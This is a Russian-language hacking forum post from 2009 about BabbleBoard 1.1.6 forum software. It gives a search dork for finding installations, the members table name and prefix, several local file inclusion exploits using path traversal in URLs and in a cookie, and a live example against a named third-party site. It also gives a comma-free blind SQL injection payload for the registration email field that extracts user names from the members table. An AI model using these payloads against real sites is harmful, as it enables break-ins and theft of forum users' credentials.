18.11.2009, 03:01
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
BabbleBoard 1.1.6
Сайт: http://www.babbleboard.co.uk/
Табличка с юзерами: members (name, password)
Дефолтовый префикс: babbleboard_
дорк: "Powered by BabbleBoard"
Гугл выдал пару xss и csrf. Если я набоянил тут – сори
Множественные LFI’и , вот некоторые
mycontrols.php ( нужно быть зарегенным )
PHP код:
include "includes/pages/mycontrols/" . $_GET['act'] . ".php";
index.php?page=mycontrols&act=../../../../robots.txt%00
admin.php ( нужно быть админом)
PHP код:
include "includes/pages/admin/" . $_GET['act'] . ".php";
index.php?page=admin&act= ../../../../robots.txt%00
header.php
PHP код:
if (isset($_COOKIE['bb_lang']) && (!isset($_COOKIE['bb_name']))) {
$board_lang = $_COOKIE['bb_lang'];
// Get language files...
include "lang/$board_lang/lang_forum.php";
Редактируем куки bb_lang=../../../../../robots.txt%00
structure.php
PHP код:
$page = $_GET['page'];
$page = escape_string($page);
elseif (@include ("includes/pages/$page.php"))
site.com/forum/index.php?page=../../../../robots.txt/././.[...]
Пример: http://else-design.info/forum/index.php?page=../../../../robots.txt/././././.[...]/./.
SQL-injection
При меджик_квотес офф
Уязвимый код:
register.php
PHP код:
} elseif ($_POST['form'] != '') {
$query_email = "select EMAIL from {$db_prefix}members WHERE EMAIL='".$_POST['email']."'";
$result_email = mysql_query($query_email) or die("register.php - Error in query: $query_email");
$email_clash = mysql_num_rows($result_email);
Эксплуатировать инъекцию можно при регистрации, вставляя свой скл-код в поле email. Правда там есть такой злобный жаваскриптовский фильтр, который не даст нам зарегится, пока мы не удовлетворим его условия. В частности он проверяет чтобы был символ @ и не было запятых =) Можно отправить пакет вручную или состряпать например такой няшный запрос, чтобы обойтись без запятых
filter@fuckoff'/**/or/**/(case/**/when/**/ascii(substring((select/**/name/**/from/**/babbleboard_members/**/limit/**/1/*
*/offset/**/0)/**/from/**/1/**/for/**/1))>97/**/then/**/'1'/**/else/**/(select/**/1/**/union/**/select/**/2)/**/end)='1
Последний раз редактировалось ElteRUS; 18.11.2009 в 15:07..
|
|
|